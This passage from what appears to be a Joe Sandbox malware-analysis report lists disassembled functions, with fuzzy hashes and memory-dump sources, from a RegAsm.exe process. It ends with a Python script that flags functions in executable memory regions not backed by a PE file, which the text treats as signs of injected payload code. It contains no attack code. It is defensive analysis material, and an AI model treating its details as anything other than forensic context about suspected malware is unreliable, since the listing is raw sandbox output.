                                                                                                • Opcode Fuzzy Hash: df4e6b0150ead07df380c603607deb0c23aff6d7cfd3c2e14a52589616784fa7
                                                                                                • Instruction Fuzzy Hash: 2B2129B1504344EFDB15EF54D5C0B26BB65FB84328F24CA6DD8098F282D335D546CB62
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2630044075.000000000188D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0188D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_188d000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 05f5aa96d367c0383d379f22bb42b3cdc94d56ee189c39a77dbee7e9b25b5c85
                                                                                                • Instruction ID: 03338cb26ac658ff173734f7a2c830255572d42cc3b6fb4891ce0c08563c32b9
                                                                                                • Opcode Fuzzy Hash: 05f5aa96d367c0383d379f22bb42b3cdc94d56ee189c39a77dbee7e9b25b5c85
                                                                                                • Instruction Fuzzy Hash: 7B213471500204EFDB15EF58D9C0B26BB61FB84318F24C6AEE8098F296C336D946CA62
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2630044075.000000000188D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0188D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_188d000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1adf1c86c6d0daaa9c3ee297e1975aa01e9b8ba88fe69a99957149df0c3af381
                                                                                                • Instruction ID: b67a9eb3f4e113fe222be4425ea94aafb44e67d3de0466e7d238f4dfe27fcd06
                                                                                                • Opcode Fuzzy Hash: 1adf1c86c6d0daaa9c3ee297e1975aa01e9b8ba88fe69a99957149df0c3af381
                                                                                                • Instruction Fuzzy Hash: E4212579500604EFDB15EF54D9C0B26FB61EF84318F20C66DD8098F292C336D946CA61
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ab0719334e946a70301f6dec6008b92d289ee0bc03b4ea3c5a81b6d84f2c0cec
                                                                                                • Instruction ID: 158290f0f98efb035588d48ef8944a5ce1d6ae950cd6aa42f0c33c46d11ffa7d
                                                                                                • Opcode Fuzzy Hash: ab0719334e946a70301f6dec6008b92d289ee0bc03b4ea3c5a81b6d84f2c0cec
                                                                                                • Instruction Fuzzy Hash: 9521F1B2A00525CFCB00DF98D980A9AF7B2FF40305F1586A5D455ABB52C331FC06DBA1
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6eefbc8a7e95920e93af03e882225284e43283d1383bc2ea388bb6562d0fc0c3
                                                                                                • Instruction ID: 5d9c7ed85b34b4f606dc3b17a06983cf1b75b5fb805c9e3163a959df6edb1948
                                                                                                • Opcode Fuzzy Hash: 6eefbc8a7e95920e93af03e882225284e43283d1383bc2ea388bb6562d0fc0c3
                                                                                                • Instruction Fuzzy Hash: 65113872B053496FC705EB788C10A9E3BABEFC220070481AAD104CF251DE35CE46D3E2
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 070bd8e0a3867abf8c29949bfbdb096dd6f4f68db59601083c3129bc523f16d0
                                                                                                • Instruction ID: 7dc5e4c5fb9aa8677ebf52f1a9f3b9e7e87105a341f143602f306a78932ef3da
                                                                                                • Opcode Fuzzy Hash: 070bd8e0a3867abf8c29949bfbdb096dd6f4f68db59601083c3129bc523f16d0
                                                                                                • Instruction Fuzzy Hash: 921104706017419FEB56FB38D8406ED77A1EF82254B608B69D1008F682DB399D0B8BD3
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a7c9de2c5d8183bcaba3237efcbd04fd5cd959804cb7d1d8b71130dc727c23e0
                                                                                                • Instruction ID: 43ac2a90ada2ee8770528f6a5803c0c744bdeb4281f300b42102046b709b4ff8
                                                                                                • Opcode Fuzzy Hash: a7c9de2c5d8183bcaba3237efcbd04fd5cd959804cb7d1d8b71130dc727c23e0
                                                                                                • Instruction Fuzzy Hash: 491139763001249FCB08DF59E894C5A7BBAFF8C761B148156FA098B365CB32DC12DBA0
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2630044075.000000000188D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0188D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_188d000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e173d83260521b16678ca7d2b1e0f986cdc6a2ea89473de2067ebc38b1b599b3
                                                                                                • Instruction ID: c9b803fbfd2954180f8874276462b497af3f8d5bcdf2c15e83c24060c6a784d7
                                                                                                • Opcode Fuzzy Hash: e173d83260521b16678ca7d2b1e0f986cdc6a2ea89473de2067ebc38b1b599b3
                                                                                                • Instruction Fuzzy Hash: 3311B276504680DFDB12DF14D5C4B19FF61FB84324F24C6A9D8494B686C33AD546CB52
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2630044075.000000000188D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0188D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_188d000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 81dc69f17ca08604d604c64cef90923a1607f1b6571ccfc77995c09e0a8f60c7
                                                                                                • Instruction ID: 8a583b47838f3467644ce8c671e18847841a0c398e3f8cf9e2a0496c62e0d6ed
                                                                                                • Opcode Fuzzy Hash: 81dc69f17ca08604d604c64cef90923a1607f1b6571ccfc77995c09e0a8f60c7
                                                                                                • Instruction Fuzzy Hash: 3611D979504680DFDB06DF54DA80B15FBA1EB84314F28CAA9D8098B692C33AD44ACB62
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2630044075.000000000188D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0188D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_188d000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 81dc69f17ca08604d604c64cef90923a1607f1b6571ccfc77995c09e0a8f60c7
                                                                                                • Instruction ID: bd74f5e47b29ed5ec59dbbb2f488067f3a1d5f7ab3285febe648963e60554061
                                                                                                • Opcode Fuzzy Hash: 81dc69f17ca08604d604c64cef90923a1607f1b6571ccfc77995c09e0a8f60c7
                                                                                                • Instruction Fuzzy Hash: 4911BB76504680DFDB06DF54D5C0B15BFA1FB84318F28C6AAE8098B696C33AD54ACF62
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d54543cd5a9cc8f86fb0efa53270028231a6b7e2e0a3171aa4261250432d4db5
                                                                                                • Instruction ID: a929c300f2fe6f0744e70c681eb9f6a09fe4614b208d1d98b82a1a53c394a4bc
                                                                                                • Opcode Fuzzy Hash: d54543cd5a9cc8f86fb0efa53270028231a6b7e2e0a3171aa4261250432d4db5
                                                                                                • Instruction Fuzzy Hash: 5C11C2706017559BDB55FB38E84069D77A2EB85254B608B29D1008F282EF75ED0B8BD3
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a90d85b5d8ffc5cbb67ee3a60b272b391ebaacb56f25c2b1ab22d12de7c444da
                                                                                                • Instruction ID: 1d16398e6e9d12be13994fdc57f0f51e4b9c63a114dfffb76467dffb70401f82
                                                                                                • Opcode Fuzzy Hash: a90d85b5d8ffc5cbb67ee3a60b272b391ebaacb56f25c2b1ab22d12de7c444da
                                                                                                • Instruction Fuzzy Hash: 8D01DB71B012046BCB50EAA99C409DFBBEADFC92507158236E909D7305DA309D0293F1
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c31599c03b1ad869e5e3ebae1a20bbd746fe469b2daed38af329f2d1353e5620
                                                                                                • Instruction ID: 25fc9de22b8bada8bc0e69bb6c41af206f69c3d428a134a9846857676a73f11e
                                                                                                • Opcode Fuzzy Hash: c31599c03b1ad869e5e3ebae1a20bbd746fe469b2daed38af329f2d1353e5620
                                                                                                • Instruction Fuzzy Hash: 8C014B72305228AF8B01DF59DC84C9FBFAEEF8D260715815AF549C7361CB7099028BA0
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f52ea4c1315e1ebc7fedbcc303a1f887911585c6ae389a1f9bea57cf316c68b6
                                                                                                • Instruction ID: af28ffcb1b096f5cb41db1dcd1a8e2de149248e5acffb82b28d9baf5a6863421
                                                                                                • Opcode Fuzzy Hash: f52ea4c1315e1ebc7fedbcc303a1f887911585c6ae389a1f9bea57cf316c68b6
                                                                                                • Instruction Fuzzy Hash: 19017874D01319EFCB50DFA8E840ADABBF1FF48304B108628D559A7340D731AA42CF90
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: bef2afa5892b5062ffbf7b507120572e4cdc549c9f19c187dee6a87af5684346
                                                                                                • Instruction ID: df71ef3aad9aa3370d85fe3d347b60e500bdf6748016225870f31b48efbd24b4
                                                                                                • Opcode Fuzzy Hash: bef2afa5892b5062ffbf7b507120572e4cdc549c9f19c187dee6a87af5684346
                                                                                                • Instruction Fuzzy Hash: BBF024711013646FD32287169C50CEBBBBFFBC4352B18851AF986CBA41C6349956D3B1
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 19a850570267831c1ece5ad669d8dbd461926fcc82a748de752e35112c9f1e71
                                                                                                • Instruction ID: e1f5f838473e935201e5540e27d5a627aec2b80b2144b589a9692aebfec85f04
                                                                                                • Opcode Fuzzy Hash: 19a850570267831c1ece5ad669d8dbd461926fcc82a748de752e35112c9f1e71
                                                                                                • Instruction Fuzzy Hash: A6F0F976700128AF8B44DF59D884C9FBBAEFF8C260714802AF509C7310CA7199018BA0
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 850234dd28c2c1e250c76cc4359c7294f6b49a9d90f77cf0a29ef9ce2b4ffbdd
                                                                                                • Instruction ID: 812dbadb088c1f1547f2368121dd3fc941cff2e5663c51d090129f47b8df1608
                                                                                                • Opcode Fuzzy Hash: 850234dd28c2c1e250c76cc4359c7294f6b49a9d90f77cf0a29ef9ce2b4ffbdd
                                                                                                • Instruction Fuzzy Hash: 86F0E5B26197542FC315977C8C109DB6BAEDB8251070582A6E088CFA52DE748C9283E2
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d074b555659945d2978815ca82cf15cad6dba53efee095eb2fae6bb4c588b87b
                                                                                                • Instruction ID: 16703b9fe81aa8fc92b6205140cc86c40fa2ce678c779d6aa21d6db0685471c9
                                                                                                • Opcode Fuzzy Hash: d074b555659945d2978815ca82cf15cad6dba53efee095eb2fae6bb4c588b87b
                                                                                                • Instruction Fuzzy Hash: D4F01470D0021ADFCB54DFA9D8446AEB7F1FF48314F608529D519A7210E335AA42CF80
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 02cb89dbd6ef51b58c7de31794059ef31ced9325cc055262595b2aef07bf9287
                                                                                                • Instruction ID: 0ee7fae933e1b2001cb66f6c8f492a3d95586c6b14c632058a79279b3d53bd9b
                                                                                                • Opcode Fuzzy Hash: 02cb89dbd6ef51b58c7de31794059ef31ced9325cc055262595b2aef07bf9287
                                                                                                • Instruction Fuzzy Hash: 1BF0A7725006246FD320565ADC40DB7BBFEFBC8321B148529F94683600C675A842D7B1
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: cd88f96f7051e33f23a79e556946602a64b4f9538dfbc446608f5ac87db6dfa6
                                                                                                • Instruction ID: ba39f6d97dbc4fdac6200c23e293553344cee9c1d6c0906d6018b7504d2d2c1b
                                                                                                • Opcode Fuzzy Hash: cd88f96f7051e33f23a79e556946602a64b4f9538dfbc446608f5ac87db6dfa6
                                                                                                • Instruction Fuzzy Hash: 1FE0D86130A3642BC741767D685049BBFEAEBC656079501BFE249C7342DD614C0683F7
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8d593d1be17efeed7732dabbdb61e6a60b0b2c13f0d54f778bab1b6bc9aca3a9
                                                                                                • Instruction ID: db8f3927d021313e051ad4716ceb2e9a283fd4d23090698413a4cb1c09f1e464
                                                                                                • Opcode Fuzzy Hash: 8d593d1be17efeed7732dabbdb61e6a60b0b2c13f0d54f778bab1b6bc9aca3a9
                                                                                                • Instruction Fuzzy Hash: 84F055B16007868BDF81B734E80429C7751AF812E0F208721C0004F641EF38D96787C3
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4bba17aa6de467cd48baf6aa863f19b2f1922e0fc6aac85f4257fc487b0113ff
                                                                                                • Instruction ID: f3249b1cbe0872bac5e5b5632db2aace34f8003a7b57817832aa9643e2abe624
                                                                                                • Opcode Fuzzy Hash: 4bba17aa6de467cd48baf6aa863f19b2f1922e0fc6aac85f4257fc487b0113ff
                                                                                                • Instruction Fuzzy Hash: 65D02EA2300130138644219E288086FAACEEBC9960780003EE20DC3300CD219C0243E6
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 7l^H$7l^Q$7l^Z$7l^c
                                                                                                • API String ID: 0-2174990222
                                                                                                • Opcode ID: 87f897bcd953d334002ccb494bb03de6c24893b9d48a1cc75dae3de25a6c810f
                                                                                                • Instruction ID: 1224b53c92a41996ae5026893d2115f7568bde353d4a8d7cd0f11985d7f83933
                                                                                                • Opcode Fuzzy Hash: 87f897bcd953d334002ccb494bb03de6c24893b9d48a1cc75dae3de25a6c810f
                                                                                                • Instruction Fuzzy Hash: 2B0147E3A40A384EE201BB7C64085C1AF92ED545B8B16126BD544CF203D574488AE7EE
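Every function entry above repeats the same four lines of provenance (Source File, Snapshot File, API/String IDs) around its opcode and fuzzy-hash fields, so a reader wanting to pivot on them has to pull the listing apart. The parser below is an added example, not code from this report or from Joe Sandbox: it splits the listing into records, decodes the `Source File` line, and keeps only records whose code sits in executable memory that is not mapped from a PE image. The reading of the dotted `.sdmp` name as PID.stage.timestamp.base.protection is an assumption made from the visible values; it is cross-checked against the `Snapshot File` name (`hcaresult_14_2_7020000_RegAsm.jbxd`), and the page-protection constants are the standard winnt.h ones. The sample text is constructed from two entries visible on this page.

```python
"""Parse per-function records of a Joe Sandbox disassembly listing.

Added example, not report or Joe Sandbox code. ASSUMPTION: the dotted
.sdmp name is PID.stage.timestamp.base.protection.<rest>; the Snapshot
File name is used to check that reading. PAGE_* values are winnt.h.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY",
                0x04: "PAGE_READWRITE", 0x08: "PAGE_WRITECOPY",
                0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}

_BULLET = re.compile(r"^[•*-]?\s*(?P<key>[^:]+?):\s*(?P<val>.*)$")
_SOURCE = re.compile(r"(?P<name>\S+\.sdmp),\s*Offset:\s*(?P<off>[0-9A-Fa-f]+),"
                     r"\s*based on PE:\s*(?P<pe>true|false)", re.I)
_SNAPSHOT = re.compile(r"hcaresult_(?P<pid>\d+)_(?P<stage>\d+)_"
                       r"(?P<base>[0-9A-Fa-f]+)_(?P<proc>.+)\.jbxd$")

# Constructed sample: a truncated fragment, then two entries from the listing.
SAMPLE = """
• Instruction Fuzzy Hash: 8C014B72305228AF8B01DF59DC84C9FBFAEEF8D260715815AF549C7361CB7099028BA0
Memory Dump Source
• Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bef2afa5892b5062ffbf7b507120572e4cdc549c9f19c187dee6a87af5684346
• Instruction Fuzzy Hash: BBF024711013646FD32287169C50CEBBBBFFBC4352B18851AF986CBA41C6349956D3B1
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
Similarity
• API ID:
• String ID: 7l^H$7l^Q$7l^Z$7l^c
• API String ID: 0-2174990222
• Opcode ID: 87f897bcd953d334002ccb494bb03de6c24893b9d48a1cc75dae3de25a6c810f
• Instruction Fuzzy Hash: 2B0147E3A40A384EE201BB7C64085C1AF92ED545B8B16126BD544CF203D574488AE7EE
"""


@dataclass
class FunctionRecord:
    fields: Dict[str, str] = field(default_factory=dict)

    def get(self, key: str) -> str:
        return self.fields.get(key, "")

    @property
    def source(self) -> Optional[dict]:
        """Decode the 'Source File' line (dotted-name layout is assumed)."""
        m = _SOURCE.search(self.get("Source File"))
        if not m:
            return None
        parts = m.group("name")[: -len(".sdmp")].split(".")
        protect = int(parts[4], 16)
        return {"pid": int(parts[0], 16), "stage": int(parts[1], 16),
                "base": int(parts[3], 16), "offset": int(m.group("off"), 16),
                "protect": PAGE_PROTECT.get(protect, hex(protect)),
                "executable": protect in EXECUTABLE,
                "pe_backed": m.group("pe").lower() == "true"}

    @property
    def snapshot(self) -> Optional[dict]:
        m = _SNAPSHOT.search(self.get("Snapshot File"))
        if not m:
            return None
        return {"pid": int(m.group("pid")), "stage": int(m.group("stage")),
                "base": int(m.group("base"), 16), "process": m.group("proc")}


def parse_records(text: str) -> List[FunctionRecord]:
    """A record starts at 'Memory Dump Source' and counts as complete once it
    carries an 'Opcode ID'; a fragment cut off before the first header is dropped."""
    records: List[FunctionRecord] = []
    current: Optional[FunctionRecord] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            current = FunctionRecord()
            records.append(current)
            continue
        m = _BULLET.match(line)
        if m and current is not None:
            current.fields[m.group("key").strip()] = m.group("val").strip()
    return [r for r in records if r.get("Opcode ID")]


def snapshot_consistent(rec: FunctionRecord) -> bool:
    """Check the assumed .sdmp field layout against the Snapshot File name."""
    s, snap = rec.source, rec.snapshot
    return bool(s and snap and all(s[k] == snap[k] for k in ("pid", "stage", "base")))


def unbacked_executable_regions(recs: List[FunctionRecord]) -> List[FunctionRecord]:
    """Functions in executable memory not mapped from a PE on disk: the footprint
    of code unpacked or injected at runtime rather than loaded by the OS."""
    return [r for r in recs if r.source and r.source["executable"]
            and not r.source["pe_backed"]]


def records_with_strings(recs: List[FunctionRecord]) -> List[FunctionRecord]:
    return [r for r in recs if r.get("String ID")]


if __name__ == "__main__":
    for r in unbacked_executable_regions(parse_records(SAMPLE)):
        s = r.source
        print(r.get("Opcode ID")[:12], r.snapshot["process"], s["pid"],
              hex(s["base"]), s["protect"], repr(r.get("String ID")))
```

Run over the sample, both records decode to PID 14 (0x0E), stage 2, base 0x07020000 with protection 0x40 (PAGE_EXECUTE_READWRITE) and `based on PE: false`, and the decoded values match the `hcaresult_14_2_7020000_RegAsm` snapshot name, which is what gives the assumed field layout its footing. A RWX region in RegAsm.exe that is not backed by an image on disk is exactly where injected or unpacked payload code would be found, so these are the functions worth pivoting on via their Instruction Fuzzy Hash when comparing other dumps of the same family.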